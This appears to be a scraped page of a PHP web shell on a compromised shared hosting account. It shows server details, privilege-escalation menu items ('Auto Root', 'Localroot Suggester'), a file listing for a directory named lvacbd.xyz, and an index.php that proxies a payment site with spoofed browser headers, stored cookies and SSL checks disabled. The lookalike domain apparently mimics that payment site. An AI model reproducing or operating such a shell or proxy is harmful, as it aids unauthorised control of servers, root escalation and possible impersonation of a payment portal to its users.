Linux premium242.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
Server IP : 66.29.146.154 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : tukiwyzk
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
tukiwyzk /
lvacbd.xyz /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2025-10-17 07:59
1.php
4.32
KB
-rw-r--r--
2025-08-10 22:52
cookie.txt
131
B
-rw-r--r--
2025-12-09 00:15
index.php
1.39
KB
-rw-r--r--
2025-05-18 12:22
Save
Rename
<?php $url = "https://payment.ivacbd.com/"; $cookieFile = __DIR__ . '/cookie.txt'; // Cookie storage $headers = [ "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language: en-US,en;q=0.5", "Cache-Control: max-age=0", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "Sec-Fetch-Dest: document", "Sec-Fetch-Mode: navigate", "Sec-Fetch-Site: none", "Sec-Fetch-User: ?1", "TE: trailers" ]; // Real browser User-Agent $userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable SSL verification for testing curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_USERAGENT, $userAgent); curl_setopt($ch, CURLOPT_ENCODING, ""); // Handle gzip/deflate curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Cookie handling curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieFile); // Save cookies to this file curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieFile); // Read cookies from this file $response = curl_exec($ch); if (curl_errno($ch)) { echo "cURL Error: " . curl_error($ch); } else { echo $response; } curl_close($ch); ?>